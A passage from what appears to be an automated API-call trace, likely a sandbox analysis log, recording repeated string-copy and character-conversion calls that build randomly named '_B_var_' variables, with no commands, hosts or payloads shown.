_Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2c6e | out: _Dst=0x144ec0) returned 0x0 [0070.062] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="bXxABAo" | out: _Dst="bXxABAo") returned 0x0 [0070.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="bXxABAo") returned 8 [0070.063] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2c96 | out: _Dst=0x67c2d20) returned 0x0 [0070.063] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_bXxABAo" | out: _Dst="_B_var_bXxABAo") returned 0x0 [0070.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_bXxABAo") returned 15 [0070.063] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2c96 | out: _Dst=0x144ec0) returned 0x0 [0070.063] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="NAAwUGD" | out: _Dst="NAAwUGD") returned 0x0 [0070.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="NAAwUGD") returned 8 [0070.063] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2cbe | out: _Dst=0x67c2d20) returned 0x0 [0070.063] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_NAAwUGD" | out: _Dst="_B_var_NAAwUGD") returned 0x0 [0070.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_NAAwUGD") returned 15 [0070.063] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2cbe | out: _Dst=0x144ec0) returned 0x0 [0070.063] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="iXxAAAAw" | out: _Dst="iXxAAAAw") returned 0x0 [0070.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="iXxAAAAw") returned 9 [0070.063] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2ce6 | out: _Dst=0x67c2d20) returned 0x0 [0070.063] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_iXxAAAAw" | out: _Dst="_B_var_iXxAAAAw") returned 0x0 [0070.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_iXxAAAAw") returned 16 [0070.063] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2ce6 | out: _Dst=0x144ec0) returned 0x0 [0070.063] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d20) returned 0x0 [0070.063] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.064] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.064] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="i44DG_" | out: _Dst="i44DG_") returned 0x0 [0070.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="i44DG_") returned 7 [0070.064] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2c46 | out: _Dst=0x67c2d20) returned 0x0 [0070.064] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_i44DG_" | out: _Dst="_B_var_i44DG_") returned 0x0 [0070.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_i44DG_") returned 14 [0070.064] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2c46 | out: _Dst=0x144ec0) returned 0x0 [0070.064] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="DAAXAQAA" | out: _Dst="DAAXAQAA") returned 0x0 [0070.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="DAAXAQAA") returned 9 [0070.064] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2d3a | out: _Dst=0x67c2d20) returned 0x0 [0070.064] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_DAAXAQAA" | out: _Dst="_B_var_DAAXAQAA") returned 0x0 [0070.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_DAAXAQAA") returned 16 [0070.064] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2d3a | out: _Dst=0x144ec0) returned 0x0 [0070.064] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="V4AABU" | out: _Dst="V4AABU") returned 0x0 [0070.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="V4AABU") returned 7 [0070.064] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2d12 | out: _Dst=0x67c2d20) returned 0x0 [0070.065] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_V4AABU" | out: _Dst="_B_var_V4AABU") returned 0x0 [0070.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_V4AABU") returned 14 [0070.065] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2d12 | out: _Dst=0x144ec0) returned 0x0 [0070.065] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="rAAUGAA" | out: _Dst="rAAUGAA") returned 0x0 [0070.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="rAAUGAA") returned 8 [0070.065] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2e82 | out: _Dst=0x67c2d20) returned 0x0 [0070.065] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_rAAUGAA" | out: _Dst="_B_var_rAAUGAA") returned 0x0 [0070.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_rAAUGAA") returned 15 [0070.065] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2e82 | out: _Dst=0x144ec0) returned 0x0 [0070.065] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="NAAAxAGk" | out: _Dst="NAAAxAGk") returned 0x0 [0070.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="NAAAxAGk") returned 9 [0070.065] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2eaa | out: _Dst=0x67c2d20) returned 0x0 [0070.065] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_NAAAxAGk" | out: _Dst="_B_var_NAAAxAGk") returned 0x0 [0070.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_NAAAxAGk") returned 16 [0070.065] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2eaa | out: _Dst=0x144ec0) returned 0x0 [0070.065] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="rCAUBU" | out: _Dst="rCAUBU") returned 0x0 [0070.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="rCAUBU") returned 7 [0070.066] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2ed6 | out: _Dst=0x67c2d20) returned 0x0 [0070.066] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_rCAUBU" | out: _Dst="_B_var_rCAUBU") returned 0x0 [0070.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_rCAUBU") returned 14 [0070.066] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2ed6 | out: _Dst=0x144ec0) returned 0x0 [0070.066] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="iAABok" | out: _Dst="iAABok") returned 0x0 [0070.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="iAABok") returned 7 [0070.066] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2efe | out: _Dst=0x67c2d20) returned 0x0 [0070.066] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_iAABok" | out: _Dst="_B_var_iAABok") returned 0x0 [0070.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_iAABok") returned 14 [0070.066] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2efe | out: _Dst=0x144ec0) returned 0x0 [0070.066] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="rUAD1A" | out: _Dst="rUAD1A") returned 0x0 [0070.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="rUAD1A") returned 7 [0070.066] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2f26 | out: _Dst=0x67c2d20) returned 0x0 [0070.066] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_rUAD1A" | out: _Dst="_B_var_rUAD1A") returned 0x0 [0070.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_rUAD1A") returned 14 [0070.066] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2f26 | out: _Dst=0x144ec0) returned 0x0 [0070.066] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="hDADAk4" | out: _Dst="hDADAk4") returned 0x0 [0070.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="hDADAk4") returned 8 [0070.067] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2f4e | out: _Dst=0x67c2d20) returned 0x0 [0070.067] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_hDADAk4" | out: _Dst="_B_var_hDADAk4") returned 0x0 [0070.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_hDADAk4") returned 15 [0070.067] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2f4e | out: _Dst=0x144ec0) returned 0x0 [0070.067] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="KGAABBAX" | out: _Dst="KGAABBAX") returned 0x0 [0070.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="KGAABBAX") returned 9 [0070.067] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2f76 | out: _Dst=0x67c2d20) returned 0x0 [0070.067] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_KGAABBAX" | out: _Dst="_B_var_KGAABBAX") returned 0x0 [0070.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_KGAABBAX") returned 16 [0070.067] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2f76 | out: _Dst=0x144ec0) returned 0x0 [0070.067] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="QxAxDD" | out: _Dst="QxAxDD") returned 0x0 [0070.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="QxAxDD") returned 7 [0070.067] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2fa2 | out: _Dst=0x67c2d20) returned 0x0 [0070.067] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_QxAxDD" | out: _Dst="_B_var_QxAxDD") returned 0x0 [0070.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_QxAxDD") returned 14 [0070.067] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2fa2 | out: _Dst=0x144ec0) returned 0x0 [0070.067] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="YAckUAB" | out: _Dst="YAckUAB") returned 0x0 [0070.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="YAckUAB") returned 8 [0070.068] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2fca | out: _Dst=0x67c2d20) returned 0x0 [0070.068] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_YAckUAB" | out: _Dst="_B_var_YAckUAB") returned 0x0 [0070.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_YAckUAB") returned 15 [0070.068] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2fca | out: _Dst=0x144ec0) returned 0x0 [0070.068] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="EAAUGA" | out: _Dst="EAAUGA") returned 0x0 [0070.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="EAAUGA") returned 7 [0070.068] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2d8e | out: _Dst=0x67c2d20) returned 0x0 [0070.068] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_EAAUGA" | out: _Dst="_B_var_EAAUGA") returned 0x0 [0070.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_EAAUGA") returned 14 [0070.068] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2d8e | out: _Dst=0x144ec0) returned 0x0 [0070.068] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="qkDD_xQx" | out: _Dst="qkDD_xQx") returned 0x0 [0070.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="qkDD_xQx") returned 9 [0070.068] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2db6 | out: _Dst=0x67c2d20) returned 0x0 [0070.068] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_qkDD_xQx" | out: _Dst="_B_var_qkDD_xQx") returned 0x0 [0070.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_qkDD_xQx") returned 16 [0070.068] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2db6 | out: _Dst=0x144ec0) returned 0x0 [0070.068] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="vADQUZA" | out: _Dst="vADQUZA") returned 0x0 [0070.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="vADQUZA") returned 8 [0070.069] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2de2 | out: _Dst=0x67c2d20) returned 0x0 [0070.069] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_vADQUZA" | out: _Dst="_B_var_vADQUZA") returned 0x0 [0070.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_vADQUZA") returned 15 [0070.069] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2de2 | out: _Dst=0x144ec0) returned 0x0 [0070.069] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="jDAAAD" | out: _Dst="jDAAAD") returned 0x0 [0070.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="jDAAAD") returned 7 [0070.069] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2e0a | out: _Dst=0x67c2d20) returned 0x0 [0070.069] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_jDAAAD" | out: _Dst="_B_var_jDAAAD") returned 0x0 [0070.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_jDAAAD") returned 14 [0070.069] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2e0a | out: _Dst=0x144ec0) returned 0x0 [0070.069] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="fQUAAAA" | out: _Dst="fQUAAAA") returned 0x0 [0070.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="fQUAAAA") returned 8 [0070.069] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2e32 | out: _Dst=0x67c2d20) returned 0x0 [0070.069] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_fQUAAAA" | out: _Dst="_B_var_fQUAAAA") returned 0x0 [0070.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_fQUAAAA") returned 15 [0070.069] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2e32 | out: _Dst=0x144ec0) returned 0x0 [0070.070] wcscpy_s (in: _Destination=0xafdb8f8, _SizeInWords=0x7, _Source="Create" | out: _Destination="Create") returned 0x0 [0070.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2d66, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QAXAkZ") returned 7 [0070.070] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="QAXAkZ" | out: _Dst="QAXAkZ") returned 0x0 [0070.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="QAXAkZ") returned 7 [0070.070] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2d66 | out: _Dst=0x67c2d20) returned 0x0 [0070.070] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_QAXAkZ" | out: _Dst="_B_var_QAXAkZ") returned 0x0 [0070.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_QAXAkZ") returned 14 [0070.070] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2d66 | out: _Dst=0x144ec0) returned 0x0 [0070.070] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="MAkc4kcA" | out: _Dst="MAkc4kcA") returned 0x0 [0070.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="MAkc4kcA") returned 9 [0070.070] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2ff2 | out: _Dst=0x67c2d20) returned 0x0 [0070.070] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_MAkc4kcA" | out: _Dst="_B_var_MAkc4kcA") returned 0x0 [0070.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_MAkc4kcA") returned 16 [0070.070] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2ff2 | out: _Dst=0x144ec0) returned 0x0 [0070.070] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="IGZZAXA" | out: _Dst="IGZZAXA") returned 0x0 [0070.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="IGZZAXA") returned 8 [0070.071] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cc001e | out: _Dst=0x67c2d20) returned 0x0 [0070.071] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_IGZZAXA" | out: _Dst="_B_var_IGZZAXA") returned 0x0 [0070.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_IGZZAXA") returned 15 [0070.071] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cc001e | out: _Dst=0x144ec0) returned 0x0 [0070.071] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="ABUUwBAc" | out: _Dst="ABUUwBAc") returned 0x0 [0070.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="ABUUwBAc") returned 9 [0070.071] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cc0072 | out: _Dst=0x67c2d20) returned 0x0 [0070.071] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_ABUUwBAc" | out: _Dst="_B_var_ABUUwBAc") returned 0x0 [0070.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_ABUUwBAc") returned 16 [0070.071] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cc0072 | out: _Dst=0x144ec0) returned 0x0 [0070.071] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="i4AAwQA4" | out: _Dst="i4AAwQA4") returned 0x0 [0070.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="i4AAwQA4") returned 9 [0070.071] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cc0046 | out: _Dst=0x67c2d20) returned 0x0 [0070.071] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_i4AAwQA4" | out: _Dst="_B_var_i4AAwQA4") returned 0x0 [0070.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_i4AAwQA4") returned 16 [0070.071] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cc0046 | out: _Dst=0x144ec0) returned 0x0 [0070.071] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zAAUUX" | out: _Dst="zAAUUX") returned 0x0 [0070.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zAAUUX") returned 7 [0070.072] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cc00c6 | out: _Dst=0x67c2d20) returned 0x0 [0070.072] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zAAUUX" | out: _Dst="_B_var_zAAUUX") returned 0x0 [0070.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zAAUUX") returned 14 [0070.072] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cc00c6 | out: _Dst=0x144ec0) returned 0x0 [0070.072] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="LA1A4cD" | out: _Dst="LA1A4cD") returned 0x0 [0070.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="LA1A4cD") returned 8 [0070.072] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cc00ee | out: _Dst=0x67c2d20) returned 0x0 [0070.072] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_LA1A4cD" | out: _Dst="_B_var_LA1A4cD") returned 0x0 [0070.072] MultiByteToWideChar (in: CodePage=0x0, 